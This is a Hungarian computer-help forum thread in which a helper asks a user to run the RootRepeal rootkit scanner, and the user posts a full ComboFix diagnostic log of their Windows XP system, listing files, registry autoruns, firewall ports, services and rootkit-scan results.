Name: vbev5mp.sys
Image Path: C:\WINDOWS\system32\DRIVERS\vbev5mp.sys
Address: 0xF77AC000 Size: 56064 File Visible: - Signed: -
Status: -

Name: vga.sys
Image Path: C:\WINDOWS\System32\drivers\vga.sys
Address: 0xF7904000 Size: 20992 File Visible: - Signed: -
Status: -

Name: viaide.sys
Image Path: viaide.sys
Address: 0xF7B60000 Size: 5376 File Visible: - Signed: -
Status: -

Name: Video3D32.sys
Image Path: C:\WINDOWS\System32\Drivers\Video3D32.sys
Address: 0xF704D000 Size: 10752 File Visible: - Signed: -
Status: -

Name: VIDEOPRT.SYS
Image Path: C:\WINDOWS\system32\DRIVERS\VIDEOPRT.SYS
Address: 0xF6BC2000 Size: 81920 File Visible: - Signed: -
Status: -

Name: videX32.sys
Image Path: videX32.sys
Address: 0xF78EC000 Size: 32768 File Visible: - Signed: -
Status: -

Name: VolSnap.sys
Image Path: VolSnap.sys
Address: 0xF769C000 Size: 52736 File Visible: - Signed: -
Status: -

Name: wanarp.sys
Image Path: C:\WINDOWS\system32\DRIVERS\wanarp.sys
Address: 0xF6A8B000 Size: 34560 File Visible: - Signed: -
Status: -

Name: watchdog.sys
Image Path: C:\WINDOWS\System32\watchdog.sys
Address: 0xF79D4000 Size: 20480 File Visible: - Signed: -
Status: -

Name: wdmaud.sys
Image Path: C:\WINDOWS\system32\drivers\wdmaud.sys
Address: 0xF06BE000 Size: 82944 File Visible: - Signed: -
Status: -

Name: Win32k
Image Path: \Driver\Win32k
Address: 0xBF800000 Size: 1839104 File Visible: - Signed: -
Status: -

Name: win32k.sys
Image Path: C:\WINDOWS\System32\win32k.sys
Address: 0xBF800000 Size: 1839104 File Visible: - Signed: -
Status: -

Name: WMILIB.SYS
Image Path: C:\WINDOWS\System32\Drivers\WMILIB.SYS
Address: 0xF7B5E000 Size: 8192 File Visible: - Signed: -
Status: -

Name: WMIxWDM
Image Path: \Driver\WMIxWDM
Address: 0x804D7000 Size: 2142208 File Visible: - Signed: -
Status: -


szomb. jún. 20, 2009 19:39
Profil Privát üzenet küldése
a fórum lelke
Avatar

Csatlakozott: vas. jún. 24, 2007 10:18
Hozzászólások: 6679
Tartózkodási hely: Revuca.S.k>>Szlovákia, nem tudok jól magyarul írni, ezért ilyen amit látsz,
Hozzászólás 
ok,meg futasd a rootrepeal programot
RootRepeal.exe>>Report >>>Scan >>>bepipazni>>Select ALL>>klik OK>>a skan utan >>Klik on Save Report-ted ide
http://rootrepeal.googlepages.com/RootRepeal.zip


szomb. jún. 20, 2009 18:49
Profil Privát üzenet küldése Honlap
arany tag

Csatlakozott: csüt. jan. 01, 2009 20:34
Hozzászólások: 294
Hozzászólás 
Elnézést stell , de elaludtam...éjszakás voltam ez a( svchost.exe 0x0351f496 cimen 0x0351f496 memóriaterületen writen nem végezhető el )hiba továbbra is fennáll

ComboFix 09-06-18.02 - PALI 009.06.20. 15:05.2 - NTFSx86
Microsoft Windows XP Professional 5.1.2600.2.1250.36.1038.18.1023.426 [GMT 2:00]
Running from: c:\documents and settings\PALI\Asztal\ComboFix.exe
Command switches used :: c:\documents and settings\PALI\Asztal\CFScript.txt.txt
AV: avast! antivirus 4.8.1335 [VPS 090619-0] *On-access scanning disabled* (Updated) {7591DB91-41F0-48A3-B128-1A293FD8233D}
FW: COMODO Firewall Pro *enabled* {043803A3-4F86-4ef6-AFC5-F6E02A79969B}
* Created a new restore point

WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !!

FILE ::
"c:\windows\S06C0D312.tmp"
.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.

c:\windows\S06C0D312.tmp . . . . failed to delete

.
((((((((((((((((((((((((( Files Created from 2009-05-20 to 2009-06-20 )))))))))))))))))))))))))))))))
.

2009-06-19 17:18 . 2009-06-19 17:18 26624 ----a-w- c:\windows\system32\drivers\fsbts.sys
2009-06-19 17:17 . 2009-06-20 06:07 -------- d-----w- c:\documents and settings\Rendszergazda\Local Settings\Application Data\Adobe
2009-06-19 09:53 . 2009-06-19 10:01 -------- d-----w- C:\rsit
2009-06-19 08:29 . 2009-06-19 08:29 -------- d-----w- c:\documents and settings\PALI\Application Data\Convivea
2009-06-19 08:29 . 2009-04-10 16:40 118784 ----a-w- c:\documents and settings\PALI\Application Data\Convivea\Bit_Che\scripts\x.exe
2009-06-19 08:29 . 2008-03-28 08:07 20992 ----a-w- c:\documents and settings\PALI\Application Data\Convivea\Bit_Che\languages\compare.exe
2009-06-19 08:29 . 2008-03-28 08:02 60928 ----a-w- c:\documents and settings\PALI\Application Data\Convivea\Bit_Che\scripts\update.exe
2009-06-19 08:29 . 2007-07-11 17:43 24557 ----a-w- c:\documents and settings\PALI\Application Data\Convivea\Bit_Che\scripts\special.exe
2009-06-19 08:29 . 2003-08-19 03:06 80896 ----a-w- c:\documents and settings\PALI\Application Data\Convivea\Bit_Che\scripts\x.dll
2009-06-19 08:29 . 2009-06-19 08:29 -------- d-----w- c:\program files\Bit Che
2009-06-18 06:03 . 2008-12-11 06:38 159600 ----a-w- c:\windows\system32\drivers\pctgntdi.sys
2009-06-18 06:02 . 2009-04-03 09:18 130936 ----a-w- c:\windows\system32\drivers\PCTCore.sys
2009-06-18 06:02 . 2008-12-18 10:16 73840 ----a-w- c:\windows\system32\drivers\PCTAppEvent.sys
2009-06-18 06:02 . 2009-06-18 06:03 -------- d-----w- c:\program files\Common Files\PC Tools
2009-06-18 06:02 . 2008-12-10 09:36 64392 ----a-w- c:\windows\system32\drivers\pctplsg.sys
2009-06-18 06:02 . 2009-06-18 06:02 -------- d-----w- c:\documents and settings\All Users\Application Data\PC Tools
2009-06-17 17:36 . 2009-06-18 06:02 51328 ----a-w- c:\windows\system32\drivers\inspect.sys
2009-06-17 17:36 . 2009-06-18 06:02 75520 ----a-w- c:\windows\system32\drivers\cmdmon.sys
2009-06-14 10:09 . 2009-06-14 10:09 -------- d-----w- c:\program files\xyr0x Security
2009-06-14 09:37 . 2009-04-10 13:37 2023768 ----a-w- c:\windows\system32\rapid.dll
2009-06-14 09:37 . 2009-04-08 12:05 16384 ---ha-w- c:\windows\system32\shell.exe
2009-06-14 09:37 . 2009-04-10 22:34 151552 ----a-w- c:\windows\system32\Rapid.exe
2009-06-14 09:37 . 2009-04-08 19:26 49 ---ha-w- c:\windows\system32\run.bat
2009-06-13 16:23 . 2009-06-14 20:24 -------- d-----w- c:\temp\{9F5FBC24-EFE2-4f90-B498-EC0FB7D47D15}
2009-06-12 15:29 . 2009-06-12 15:29 -------- d-----w- c:\program files\Driver Cleaner Pro
2009-06-10 20:37 . 2009-06-10 20:37 -------- d-----w- c:\documents and settings\PALI\Application Data\Ashampoo
2009-06-10 19:25 . 2009-06-10 19:25 -------- d-----w- c:\documents and settings\All Users\Application Data\ATI
2009-06-10 19:12 . 2009-03-16 14:04 11563008 ----a-w- c:\windows\system32\atioglxx.dll
2009-06-10 19:12 . 2009-03-16 13:40 49664 ----a-w- c:\windows\system32\atimpc32.dll
2009-06-10 19:12 . 2009-03-16 13:35 45056 ----a-w- c:\windows\system32\aticalrt.dll
2009-06-10 19:12 . 2009-03-16 13:35 131072 ----a-w- c:\windows\system32\atiadlxx.dll
2009-06-10 19:12 . 2009-03-16 13:34 45056 ----a-w- c:\windows\system32\aticalcl.dll
2009-06-10 19:12 . 2009-03-16 13:33 3264512 ----a-w- c:\windows\system32\aticaldd.dll
2009-06-10 19:12 . 2009-03-03 13:56 118784 ----a-w- c:\windows\system32\atibtmon.exe
2009-06-10 19:12 . 2009-02-26 05:40 99856 ----a-w- c:\windows\system32\drivers\AtiHdmi.sys
2009-06-10 18:42 . 2009-06-20 07:37 664 ----a-w- c:\windows\system32\d3d9caps.dat
2009-06-10 18:12 . 2005-05-07 10:43 69632 ------r- c:\windows\Alcmtr.exe
2009-06-08 20:31 . 2009-06-15 16:41 -------- d-----w- c:\program files\The FilmMachine
2009-06-08 20:19 . 2006-08-05 07:02 49152 ------r- c:\windows\system32\ChCfg.exe
2009-06-08 20:19 . 2006-07-25 08:14 86016 ------r- c:\windows\SoundMan.exe
2009-06-08 20:19 . 2006-05-20 10:04 2879488 ------r- c:\windows\SkyTel.exe
2009-06-08 20:19 . 2007-01-06 05:32 1191936 ------r- c:\windows\RtlUpd.exe
2009-06-08 20:19 . 2006-05-08 08:35 9709568 ------r- c:\windows\RTLCPL.exe
2009-06-08 20:19 . 2007-02-03 10:57 4474368 ------r- c:\windows\system32\drivers\RtkHDAud.sys
2009-06-08 20:19 . 2007-02-03 10:54 16116224 ------r- c:\windows\RTHDCPL.exe
2009-06-08 20:19 . 2006-10-15 09:42 2157568 ------r- c:\windows\MicCal.exe
2009-06-08 20:19 . 2006-05-08 08:26 2808832 ------r- c:\windows\alcwzrd.exe
2009-06-08 20:19 . 2009-06-10 18:12 -------- d-----w- c:\program files\Realtek
2009-06-08 20:19 . 2007-01-16 08:54 520192 ------r- c:\windows\RtlExUpd.dll
2009-06-05 21:53 . 2009-06-05 21:53 -------- d-----w- c:\documents and settings\PALI\Local Settings\Application Data\PCHealth
2009-06-05 21:50 . 2009-06-05 21:50 -------- d-----w- c:\documents and settings\PALI\Local Settings\Application Data\ATI
2009-06-05 21:50 . 2009-06-05 21:50 -------- d-----w- c:\documents and settings\PALI\Application Data\ATI
2009-06-05 21:48 . 2009-06-05 21:48 0 ----a-w- c:\windows\ativpsrm.bin
2009-06-05 21:33 . 2009-06-05 21:33 -------- d-----w- c:\program files\My Company Name
2009-06-05 21:27 . 2009-06-05 21:27 9158 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{89DE67AD-08B8-4699-A55D-CA5C0AF82BF3}\ARPPRODUCTICON.exe
2009-06-05 21:27 . 2009-06-05 21:27 -------- d-----w- c:\program files\Common Files\ATI Technologies
2009-06-05 21:26 . 2006-12-28 03:44 84992 ----a-r- c:\windows\system32\drivers\AtiHdAud.sys
2009-06-05 21:22 . 2009-03-16 14:17 307200 ----a-w- c:\windows\system32\atiiiexx.dll
2009-06-05 21:22 . 2009-03-16 14:27 442368 ----a-w- c:\windows\system32\ATIDEMGX.dll
2009-06-05 21:22 . 2008-02-19 13:37 887724 ----a-r- c:\windows\system32\ativva6x.dat
2009-06-05 21:22 . 2008-02-19 13:37 3107788 ----a-r- c:\windows\system32\ativva5x.dat
2009-06-05 21:21 . 2008-02-19 13:37 3107788 ----a-r- c:\windows\system32\ativvaxx.dat
2009-06-05 09:55 . 2009-02-23 15:39 184394 ----a-w- c:\windows\system32\atiicdxx.dat
2009-06-05 09:54 . 2009-06-10 19:20 -------- d-----w- c:\program files\ATI Technologies
2009-06-01 14:08 . 2009-06-01 14:08 -------- d-----w- c:\program files\FDRLab
2009-05-29 08:03 . 2009-05-29 08:03 -------- d-----w- c:\windows\system32\3Planesoft
2009-05-29 08:03 . 2009-05-29 08:03 -------- d-----w- c:\program files\3Planesoft Screensaver Manager
2009-05-29 08:03 . 2009-05-29 08:03 -------- d-----w- c:\program files\Tropical Fish 3D Screensaver

.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2009-06-20 13:15 . 2008-11-01 20:52 -------- d-----w- c:\program files\cFosSpeed
2009-06-20 13:13 . 2009-03-02 21:49 0 ------w- c:\windows\S06C0D312.tmp
2009-06-20 13:06 . 2004-08-18 12:00 449586 ----a-w- c:\windows\system32\perfh00E.dat
2009-06-20 13:06 . 2004-08-18 12:00 100660 ----a-w- c:\windows\system32\perfc00E.dat
2009-06-20 13:06 . 2008-11-21 17:19 82464 ----a-w- c:\windows\system32\perfc040.dat
2009-06-20 13:06 . 2008-11-21 17:19 414914 ----a-w- c:\windows\system32\perfh040.dat
2009-06-20 12:50 . 2008-11-01 11:53 -------- d-----w- c:\documents and settings\PALI\Application Data\uTorrent
2009-06-20 06:24 . 2008-12-24 11:42 -------- d---a-w- c:\documents and settings\All Users\Application Data\TEMP
2009-06-18 17:34 . 2008-12-24 11:42 -------- d-----w- c:\program files\Spyware Doctor
2009-06-18 10:23 . 2008-03-16 17:56 -------- d-----w- c:\program files\FairUse Wizard 2
2009-06-18 06:53 . 2008-03-16 19:54 -------- d-----w- c:\program files\Common Files\Elecard
2009-06-17 17:36 . 2009-01-13 19:32 -------- d-----w- c:\program files\Comodo
2009-06-16 07:58 . 2008-03-03 17:36 -------- d-----w- c:\documents and settings\PALI\Application Data\Vso
2009-06-14 20:52 . 2008-03-13 17:56 -------- d-----w- c:\program files\Avidemux 2.4
2009-06-13 21:38 . 2009-03-10 08:57 249856 ------w- c:\windows\Setup1.exe
2009-06-13 21:37 . 2009-03-10 08:57 73216 ----a-w- c:\windows\ST6UNST.EXE
2009-06-13 20:27 . 2009-04-07 19:22 -------- d-----w- c:\program files\MooGUI
2009-06-13 17:10 . 2008-11-01 15:11 -------- d-----w- c:\program files\Lx_cats
2009-06-10 21:18 . 2009-06-10 18:24 196608 ----a-w- c:\windows\system32\drivers\nStandard.bin
2009-06-10 20:37 . 2008-03-17 08:56 -------- d-----w- c:\program files\Ashampoo
2009-06-10 18:24 . 2009-01-01 14:45 -------- d-----w- c:\program files\ASUS
2009-06-10 18:24 . 2008-03-01 20:34 -------- d--h--w- c:\program files\InstallShield Installation Information
2009-06-09 16:55 . 2008-11-12 20:33 -------- d-----w- c:\program files\XRECODE
2009-06-09 14:00 . 2008-03-14 10:24 -------- d-----w- c:\program files\ChrisTV
2009-06-08 20:39 . 2008-03-02 21:04 -------- d-----w- c:\program files\AviSynth 2.5
2009-06-08 20:11 . 2008-03-02 19:04 -------- d-----w- c:\program files\MoBiMouse
2009-06-08 20:07 . 2008-11-22 15:47 -------- d-----w- c:\documents and settings\All Users\Application Data\InstallShield
2009-06-08 20:07 . 2008-03-06 18:03 -------- d-----w- c:\documents and settings\PALI\Application Data\InstallShield
2009-06-08 19:34 . 2008-03-03 17:42 -------- d-----w- c:\program files\Real Alternative
2009-06-06 20:45 . 2009-02-08 12:21 -------- d-----w- c:\documents and settings\PALI\Application Data\Free Download Manager
2009-06-06 20:45 . 2008-11-01 12:39 -------- d---a-w- c:\program files\USDownloader - Cap
2009-06-06 13:44 . 2008-03-26 22:46 -------- d-----w- c:\documents and settings\PALI\Application Data\Simple Sudoku
2009-06-06 13:40 . 2009-02-21 14:59 -------- d-----w- c:\program files\RapidSolution
2009-06-06 13:26 . 2009-02-21 14:44 -------- d-----w- c:\program files\Daniusoft
2009-06-04 22:40 . 2008-03-01 20:52 106496 ----a-w- c:\windows\DUMP691a.tmp
2009-05-11 22:41 . 2009-05-11 22:41 -------- d-----w- c:\program files\ProPoster
2009-05-11 22:31 . 2008-03-01 22:01 97016 ----a-w- c:\documents and settings\PALI\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
2009-05-11 22:31 . 2009-05-11 22:31 -------- d-----w- c:\program files\Poster Forge
2009-05-11 22:13 . 2008-03-16 19:47 -------- d-----w- c:\program files\Sorenson Media
2009-05-11 22:12 . 2009-05-11 22:12 10134 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{38F48AED-66D8-464C-993E-C7296C7A199B}\ARPPRODUCTICON.exe
2009-05-11 22:11 . 2009-05-11 22:11 -------- d-----w- c:\program files\BIAS
2009-05-08 07:53 . 2009-05-08 07:36 -------- d-----w- c:\program files\PhotoFiltre Studio X
2009-05-08 07:37 . 2009-05-08 07:36 -------- d-----w- c:\documents and settings\PALI\Application Data\PhotoFiltre Studio X
2009-05-04 09:01 . 2008-11-27 10:57 135773 ----a-w- c:\windows\HPHins12.dat
2009-04-27 20:17 . 2009-03-05 21:21 -------- d-----w- c:\program files\abgx360
2009-04-07 19:22 . 2009-04-07 19:22 25214 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_35bf2b9f.exe
2009-04-07 19:22 . 2009-04-07 19:22 23558 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_7e834bd2.exe
2009-04-07 19:22 . 2009-04-07 19:22 23558 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_7e8021d5.exe
2009-04-07 19:22 . 2009-04-07 19:22 23558 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_737a1221.exe
2009-04-07 19:22 . 2009-04-07 19:22 23558 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_3b7137e6.exe
2009-04-07 19:22 . 2009-04-07 19:22 22486 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_6ff64da0.exe
2009-03-23 08:27 . 2009-03-23 08:27 747566 ----a-w- c:\windows\system32\abgx360.exe
.

((((((((((((((((((((((((((((( SnapShot@2009-06-20_06.41.25 )))))))))))))))))))))))))))))))))))))))))
.
- 2009-01-13 13:00 . 2009-06-20 06:40 32768 c:\windows\temp\Temporary Internet Files\Content.IE5\index.dat
+ 2009-06-20 13:16 . 2009-06-20 13:16 32768 c:\windows\temp\Temporary Internet Files\Content.IE5\index.dat
+ 2009-06-20 13:16 . 2009-06-20 13:16 16384 c:\windows\temp\Perflib_Perfdata_cf4.dat
+ 2009-06-20 13:14 . 2009-06-20 13:14 16384 c:\windows\temp\Perflib_Perfdata_508.dat
- 2009-01-13 13:00 . 2009-06-20 06:40 32768 c:\windows\temp\History\History.IE5\index.dat
+ 2009-06-20 13:16 . 2009-06-20 13:16 32768 c:\windows\temp\History\History.IE5\index.dat
- 2009-01-13 13:00 . 2009-06-20 06:40 16384 c:\windows\temp\Cookies\index.dat
+ 2009-06-20 13:16 . 2009-06-20 13:16 16384 c:\windows\temp\Cookies\index.dat
- 2004-08-18 12:00 . 2009-06-20 06:26 71904 c:\windows\system32\perfc009.dat
+ 2004-08-18 12:00 . 2009-06-20 13:06 71904 c:\windows\system32\perfc009.dat
- 2004-08-18 12:00 . 2009-06-20 06:26 444028 c:\windows\system32\perfh009.dat
+ 2004-08-18 12:00 . 2009-06-20 13:06 444028 c:\windows\system32\perfh009.dat
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="c:\windows\system32\ctfmon.exe" [2004-08-18 15360]
"MSMSGS"="c:\program files\Messenger\Msmsgs.exe" [2008-06-02 1660952]
"DAEMON Tools"="c:\program files\DAEMON Tools\daemon.exe" [2007-04-03 165784]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"UserFaultCheck"="c:\windows\system32\dumprep 0 -u" [X]
"RecSche"="c:\program files\TVR\RecSche.exe" [2004-05-10 454656]
"ChrisTV Agent"="c:\program files\ChrisTV\ChrisTV_Agent.exe" [2005-05-02 187392]
"PinnacleDriverCheck"="c:\windows\system32\\PSDrvCheck.exe" [2004-03-10 406016]
"amd_dc_opt"="c:\program files\AMD\Dual-Core Optimizer\amd_dc_opt.exe" [2007-07-23 77824]
"lxccmon.exe"="c:\program files\Lexmark 3300 Series\lxccmon.exe" [2005-07-20 192512]
"FaxCenterServer"="c:\program files\Lexmark Fax Solutions\fm3032.exe" [2005-07-12 299008]
"cFosSpeed"="c:\program files\cFosSpeed\cFosSpeed.exe" [2007-10-17 854992]
"avast!"="c:\progra~1\ALWILS~1\Avast4\ashDisp.exe" [2009-02-05 81000]
"VC5Player"="c:\program files\HHVcdV5Sys\VC5Play.exe" [2003-11-07 176128]
"UnlockerAssistant"="c:\program files\Unlocker\UnlockerAssistant.exe" [2006-05-06 6656]
"CClipboard"="c:\program files\ComfortClipboard\CClipboard.exe" [2008-06-07 2843136]
"SunJavaUpdateSched"="c:\program files\Java\jre6\bin\jusched.exe" [2009-01-14 136600]
"CloneCDTray"="c:\program files\SlySoft\CloneCD\CloneCDTray.exe" [2006-09-28 57344]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2008-09-06 413696]
"ASUSGamerOSD"="c:\program files\ASUS\GamerOSD\GamerOSD.exe" [2007-10-23 380928]
"StartCCC"="c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2009-03-17 61440]
"LXCCCATS"="c:\windows\System32\spool\DRIVERS\W32X86\3\LXCCtime.dll" [2005-07-20 73728]
"COMODO Firewall Pro"="c:\program files\Comodo\Firewall\CPF.exe" [2009-06-18 1115728]
"SkyTel"="SkyTel.EXE" - c:\windows\SkyTel.exe [2006-05-20 2879488]
"RTHDCPL"="RTHDCPL.EXE" - c:\windows\RTHDCPL.exe [2007-02-03 16116224]

c:\documents and settings\All Users\Start Menu\Programs\Indˇt˘pult\
HP Digital Imaging Monitor.lnk - c:\program files\Hewlett-Packard\Digital Imaging\bin\hpqtra08.exe [2006-2-19 288472]
hpoddt01.exe.lnk - c:\program files\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe [2003-4-6 28672]
InterVideo WinCinema Manager.lnk - c:\program files\InterVideo\Common\Bin\WinCinemaMgr.exe [2008-12-14 167936]

[hkey_local_machine\software\microsoft\windows\currentversion\explorer\ShellExecuteHooks]
"{5AE067D3-9AFB-48E0-853A-EBB7F4A000DA}"= "c:\program files\SUPERAntiSpyware\SASSEH.DLL" [2008-05-13 77824]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\!SASWinLogon]
2008-12-22 10:05 356352 ----a-w- c:\program files\SUPERAntiSpyware\SASWINLO.dll

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ autocheck autochk *\0autocheck ??$\0autocheck T?M??

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\sdauxservice]
@=""

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\sdcoreservice]
@=""

[HKEY_LOCAL_MACHINE\software\microsoft\security center]
"AntiVirusDisableNotify"=dword:00000001
"UpdatesDisableNotify"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring]
"DisableMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecAntiVirus]
"DisableMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecFirewall]
"DisableMonitoring"=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"c:\\Program Files\\concept design\\onlineTV 3\\onlineTV.exe"=
"c:\\Program Files\\Pinnacle\\Studio 10\\programs\\RM.exe"=
"c:\\Program Files\\Pinnacle\\Studio 10\\programs\\Studio.exe"=
"c:\\Program Files\\Pinnacle\\Studio 10\\programs\\PMSRegisterFile.exe"=
"c:\\Program Files\\Pinnacle\\Studio 10\\programs\\umi.exe"=
"c:\\Program Files\\uTorrent\\uTorrent.exe"=
"c:\\Program Files\\eMule\\emule.exe"=
"c:\\WINDOWS\\system32\\lxcccoms.exe"=
"c:\\WINDOWS\\system32\\spool\\drivers\\w32x86\\3\\lxccpswx.exe"=
"c:\\Program Files\\VoipCheapCom\\VoipCheapCom.exe"=
"c:\\Program Files\\Messenger\\Msmsgs.exe"=
"c:\\Program Files\\Java\\jre6\\bin\\javaw.exe"=
"c:\\Program Files\\Java\\jre6\\bin\\java.exe"=

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"5121:TCP"= 5121:TCP:messenger
"21858:TCP"= 21858:TCP:BitComet 21858 TCP
"21858:UDP"= 21858:UDP:BitComet 21858 UDP
"26636:TCP"= 26636:TCP:BitComet 26636 TCP
"26636:UDP"= 26636:UDP:BitComet 26636 UDP
"7387:TCP"= 7387:TCP:messenger
"3389:TCP"= 3389:TCP:@xpsp2res.dll,-22009
"1253:TCP"= 1253:TCP:messenger
"135:TCP"= 135:TCP:TCP Port 135
"5000:TCP"= 5000:TCP:TCP Port 5000
"5001:TCP"= 5001:TCP:TCP Port 5001
"5002:TCP"= 5002:TCP:TCP Port 5002
"5003:TCP"= 5003:TCP:TCP Port 5003
"5004:TCP"= 5004:TCP:TCP Port 5004
"5005:TCP"= 5005:TCP:TCP Port 5005
"5006:TCP"= 5006:TCP:TCP Port 5006
"5007:TCP"= 5007:TCP:TCP Port 5007
"5008:TCP"= 5008:TCP:TCP Port 5008
"5009:TCP"= 5009:TCP:TCP Port 5009
"5010:TCP"= 5010:TCP:TCP Port 5010
"5011:TCP"= 5011:TCP:TCP Port 5011
"5012:TCP"= 5012:TCP:TCP Port 5012
"5013:TCP"= 5013:TCP:TCP Port 5013
"5014:TCP"= 5014:TCP:TCP Port 5014
"5015:TCP"= 5015:TCP:TCP Port 5015
"5016:TCP"= 5016:TCP:TCP Port 5016
"5017:TCP"= 5017:TCP:TCP Port 5017
"5018:TCP"= 5018:TCP:TCP Port 5018
"5019:TCP"= 5019:TCP:TCP Port 5019
"5020:TCP"= 5020:TCP:TCP Port 5020
"7533:TCP"= 7533:TCP:messenger
"2562:TCP"= 2562:TCP:messenger
"3117:TCP"= 3117:TCP:messenger
"8743:TCP"= 8743:TCP:messenger
"3325:TCP"= 3325:TCP:messenger
"6243:TCP"= 6243:TCP:messenger
"5575:TCP"= 5575:TCP:messenger
"5764:TCP"= 5764:TCP:messenger
"6274:TCP"= 6274:TCP:messenger
"7611:TCP"= 7611:TCP:messenger
"1721:TCP"= 1721:TCP:messenger
"2821:TCP"= 2821:TCP:messenger
"7754:TCP"= 7754:TCP:messenger
"3354:TCP"= 3354:TCP:messenger

R0 fsbts;fsbts;c:\windows\system32\drivers\fsbts.sys [2009.06.19. 19:18 26624]
R0 PCTCore;PCTools KDS;c:\windows\system32\drivers\PCTCore.sys [2009.06.18. 8:02 130936]
R1 aswSP;avast! Self Protection;c:\windows\system32\drivers\aswSP.sys [2009.01.13. 19:16 114768]
R1 nltdi;nltdi;c:\windows\system32\drivers\nltdi.sys [2007.04.23. 13:03 82200]
R1 SASDIFSV;SASDIFSV;c:\program files\SUPERAntiSpyware\sasdifsv.sys [2008.12.22. 12:06 8944]
R1 SASKUTIL;SASKUTIL;c:\program files\SUPERAntiSpyware\SASKUTIL.SYS [2008.12.22. 12:05 55024]
R1 vbev5mp;vbev5mp;c:\windows\system32\drivers\VBEV5MP.sys [2003.11.12. 9:26 56064]
R2 aswFsBlk;aswFsBlk;c:\windows\system32\drivers\aswFsBlk.sys [2009.01.13. 19:16 20560]
R2 thdudf;TOSHIBA UDF2.5 Reader File System Driver;c:\windows\system32\drivers\thdudf.sys [2008.11.23. 10:47 66944]
R3 AtiHdmiService;ATI Function Driver for HDMI Service;c:\windows\system32\drivers\AtiHdmi.sys [2009.06.10. 21:12 99856]
S2 OMSCAN;OMSCAN;\Sys --> \Sys [?]
S2 PStrip;PSTRIP;\??\c:\windows\system32\DRIVERS\PSTRIP.SYS --> c:\windows\system32\DRIVERS\PSTRIP.SYS [?]
S2 SOFTLOK;SOFTLOK; [x]
S3 RkPavproc1;RkPavproc1;\??\c:\windows\system32\drivers\RkPavproc1.sys --> c:\windows\system32\drivers\RkPavproc1.sys [?]
S3 SASENUM;SASENUM;c:\program files\SUPERAntiSpyware\SASENUM.SYS [2008.12.22. 12:06 7408]
S3 sdAuxService;PC Tools Auxiliary Service;c:\program files\Spyware Doctor\pctsAuxs.exe [2009.01.13. 23:01 348752]
S3 SndTAudio;SndTAudio;c:\windows\system32\drivers\SndTAudio.sys [2009.02.21. 16:49 23096]
S3 SndTVideo;SndTVideo;c:\windows\system32\drivers\SndTVideo.sys [2009.02.21. 16:49 3768]
S3 TNPacket;T-Systems Nova Packet Capture Driver;c:\progra~1\MATVAD~1\TNPACKET.SYS [2002.10.09. 14:38 9376]

[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\{B2C3BB6B-E005-4246-B8E5-DF0A4D073CDC}]
c:\program files\PixiePack Codec Pack\InstallerHelper.exe
.
Contents of the 'Scheduled Tasks' folder

2009-06-20 c:\windows\Tasks\AppleSoftwareUpdate.job
- c:\program files\Apple Software Update\SoftwareUpdate.exe [2008-07-30 11:34]
.
.
------- Supplementary Scan -------
.
IE: Az összes letöltése Free Download Managerrel - file://c:\program files\Free Download Manager\dlall.htm
IE: Kijelölés letöltése Free Download Managerrel - file://c:\program files\Free Download Manager\dlselected.htm
IE: Letöltés Free Download Managerrel - file://c:\program files\Free Download Manager\dllink.htm
IE: Video letöltése a Free Download Manager-rel - file://c:\program files\Free Download Manager\dlfvideo.htm
FF - ProfilePath -
.

**************************************************************************

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2009-06-20 15:17
Windows 5.1.2600 Szervizcsomag 2 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
LXCCCATS = rundll32 c:\windows\System32\spool\DRIVERS\W32X86\3\LXCCtime.dll,_RunDLLEntry@16???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************

[HKEY_LOCAL_MACHINE\System\ControlSet003\Services\OMSCAN]
"ImagePath"="\Sys"

